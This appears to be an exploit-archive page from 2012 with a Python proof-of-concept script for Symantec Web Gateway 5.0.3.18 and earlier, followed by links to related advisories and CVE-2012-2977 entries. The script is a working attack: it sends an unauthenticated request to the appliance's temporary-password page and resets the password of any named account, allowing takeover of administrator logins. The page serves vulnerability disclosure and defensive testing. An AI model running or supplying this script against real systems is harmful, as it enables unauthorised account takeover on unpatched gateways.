Lucene search
@_Kc57PACKETSTORM:115782HistoryAug 22, 2012 - 12:00 a.m.
Symantec Web Gateway 5.0.3.18 Password Change
2012-08-2200:00:00
@_Kc57
packetstormsecurity.com
34
0.009 Low
EPSS
Percentile
82.6%
`#!/usr/bin/python
import urllib
import urllib2
import re
import sys
print "[*] ###########################################################"
print "[*] Symantec Web Gateway <= 5.0.3.18 Arbitrary Password Change"
print "[*] @_Kc57"
print "[*] ###########################################################\n"
if (len(sys.argv) != 4):
print "Usage: poc.py <RHOST> <username> <newpassword>"
exit(0)
ip = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
url = "https://%s/spywall/temppassword.php" % (ip)
opts = {
'target':'executive_summary.php',
'USERNAME':username,
'password':password,
'password2':password,
'Save':'Save'
}
print "[*] Sending request to server..."
data = urllib.urlencode(opts)
request = urllib2.Request(url, data)
response = urllib2.urlopen(request)
match = re.search('Your new password has been saved', response.read())
if(match):
print "[*] Password for %s changed to %s" %(username,password)
else:
print "[*] Password change failed!"
`
Related
packetstorm
packetstorm
Symantec Web Gateway 5.0.3.18 Password Change
2012-08-22 00:00:00
openvas
openvas
Symantec Web Gateway Password Change Security Bypass Vulnerability
2012-08-22 00:00:00
Symantec Web Gateway Multiple Vulnerabilities
2012-07-24 00:00:00
prion
prion
Code injection
2012-07-23 17:55:00
cvelist
cvelist
CVE-2012-2977
2012-07-23 17:00:00
nvd
nvd
CVE-2012-2977
2012-07-23 17:55:03
cve
cve
CVE-2012-2977
2012-07-23 17:55:03
cert
cert
Symantec Web Gateway contains multiple vulnerabilities
2012-07-24 00:00:00
symantec
symantec
Symantec Web Gateway Security Issues
2012-07-20 08:00:00